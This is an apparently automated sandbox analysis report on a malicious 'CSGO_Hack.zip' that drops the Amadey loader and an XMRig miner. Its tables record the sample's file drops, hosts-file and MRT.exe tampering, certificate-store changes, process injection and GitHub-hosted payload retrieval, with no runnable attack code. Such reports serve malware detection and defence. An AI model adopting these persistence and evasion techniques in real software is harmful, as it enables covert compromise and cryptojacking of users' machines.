Analysis Overview
SHA256
37ffba131c763e2630433b2865a8149508af32f387fb5808cfaf539815bb5077
Threat Level: Known bad
The file CSGO_Hack.zip was found to be: Known bad.
Malicious Activity Summary
xmrig
Amadey
XMRig Miner payload
Stops running service(s)
Creates new service(s)
Drops file in Drivers directory
Checks BIOS information in registry
Uses the VBS compiler for execution
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Checks computer location settings
Drops file in System32 directory
Executes dropped EXE
Modifies system executable filetype association
Drops file in Windows directory
Loads dropped DLL
Launches sc.exe
Enumerates physical storage devices
Unsigned PE
Program crash
Modifies Internet Explorer settings
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Modifies data under HKEY_USERS
Modifies registry class
Modifies system certificate store
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-29 02:16
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral4
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:52
Platform
win10v2004-20240226-en
Max time kernel
1799s
Max time network
1754s
Command Line
Signatures
Amadey
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Creates new service(s)
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\SystemFiles\csrss.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\system32\conhost.exe | N/A |
Uses the VBS compiler for execution
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services\Launhcer.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\SystemFiles\csrss.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4400 set thread context of 4060 | N/A | C:\Users\Admin\AppData\Roaming\services\plugin0228 | C:\Users\Admin\AppData\Roaming\services\plugin0228 |
| PID 3692 set thread context of 1372 | N/A | C:\ProgramData\SystemFiles\csrss.exe | C:\Windows\system32\conhost.exe |
| PID 3692 set thread context of 4912 | N/A | C:\ProgramData\SystemFiles\csrss.exe | C:\Windows\system32\conhost.exe |
| PID 3732 set thread context of 3088 | N/A | C:\Users\Admin\AppData\Roaming\services\3plugin0228 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\Launhcer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\plugin0228 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\plugin0228 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\3plugin0228 | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\services\plugin0228 |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\conhost.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
